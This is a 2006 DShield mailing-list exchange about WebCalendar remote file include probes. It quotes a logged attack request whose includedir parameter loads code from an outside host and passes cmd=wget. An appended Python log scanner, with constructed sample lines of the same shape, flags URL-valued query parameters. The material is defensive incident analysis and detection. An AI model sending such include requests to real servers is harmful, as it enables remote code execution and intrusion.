[Dshield] Webcal Exploit?

George A. Theall theall at tifaware.com
Mon Feb 6 19:35:48 GMT 2006


On Mon, Feb 06, 2006 at 12:57:20PM -0500, David Cary Hart wrote:
> On Mon, 6 Feb 2006 07:16:06 -0500
> "George A. Theall" <theall at tifaware.com> opined:
> > Is it possible they're targeting webcalendar rather than webcal? There
> > was a remote file include flaw in its 'send_reminders.php' script
> > announced last August (Bugtraq ID 14651). 
> > 
> Here was the first one. I have seen four or five since, all the same pattern
> except domain instead of IPA:
> 
>
> 81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET
> http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget
> HTTP/1.0" 302 290

Yes, that's from BID 14651.  I wrote a Nessus plugin for that last
August:

  http://www.nessus.org/plugins/index.php?view=single&id=19502

George
-- 
theall at tifaware.com
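
Added example, not part of the original post and not the Nessus plugin mentioned above: a Python check that flags access-log requests shaped like the one quoted in this thread, where a query parameter such as includedir carries a URL. The sample log lines, addresses and host names are constructed, and the function name find_rfi_attempts is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A query parameter whose value is itself a URL is the remote file include pattern.
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation addresses, example host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Feb/2006:12:36:47 -0500] "GET http://198.51.100.7/Webcal42/tools/'
    'send_reminders.php?includedir=http://files.example.net/x.gif?&cmd=wget HTTP/1.0" 302 290',
    '192.0.2.11 - - [05/Feb/2006:13:02:11 -0500] "GET /webcalendar/tools/send_reminders.php'
    '?includedir=http%3A%2F%2Ffiles.example.net%2Fx.gif HTTP/1.1" 404 210',
    '192.0.2.12 - - [05/Feb/2006:13:05:40 -0500] "GET /webcalendar/month.php?date=20060206 '
    'HTTP/1.1" 200 5120',
    '192.0.2.13 - - [05/Feb/2006:13:06:02 -0500] "GET /index.php?ref=example.com HTTP/1.1" 200 100',
]

def find_rfi_attempts(lines):
    """Return one dict per request that carries a URL-valued query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        try:
            # urlsplit handles "/path?query" and proxy-style absolute targets alike.
            parts = urlsplit(m.group("target"))
        except ValueError:
            continue  # malformed request target
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_VALUE_RE.match(value):
                hits.append({"client": m.group("client"), "time": m.group("time"),
                             "path": parts.path, "param": name, "remote": value,
                             "status": int(m.group("status"))})
                break  # one report per request is enough
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Legitimate redirect or return-URL parameters also carry URLs, so in practice the match is usually narrowed to script paths or parameter names that should never receive one.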